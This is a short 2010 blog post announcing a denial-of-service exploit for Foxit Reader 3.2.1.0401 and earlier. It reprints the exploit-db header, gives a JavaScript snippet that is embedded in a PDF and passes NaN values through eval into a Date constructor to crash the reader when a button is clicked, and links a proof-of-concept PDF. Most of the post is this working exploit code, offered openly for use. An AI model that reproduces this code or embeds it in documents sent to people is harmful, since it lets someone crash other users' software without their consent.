Tuesday, April 6, 2010

Foxit Reader <= 3.2.1.0401 Denial Of Service Exploit

Ok, this is my new exploit, i found this one playing with javascript, just take a look!

http://www.exploit-db.com/exploits/12080

--------------------------------------------------------------
Title: Foxit Reader <= 3.2.1.0401 Denial Of Service Exploit
Date: 05/04/10
Author: juza - iamjuza[at]gmail[dot]com
Software Link: http://www.foxitsoftware.com/pdf/reader/
Version: All versions <= 3.2.1.0401 have the same issue
Tested on: Windows XP SP3 x32
Description: Just open the pdf and click in the button!
Greetz: Yux, Wisezilla, GSO, thanks for all!

Code:

function DoS( pdfDate ) {
eval("new Date(" + new Array(Number.NaN,
Number.NaN).toSource().replace(/[\[\]]/g, "") + ")" );
}

DoS("DoS");


-------------------------

PoC: http://www.exploit-db.com/sploits/12080.pdf

Publicada por em

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)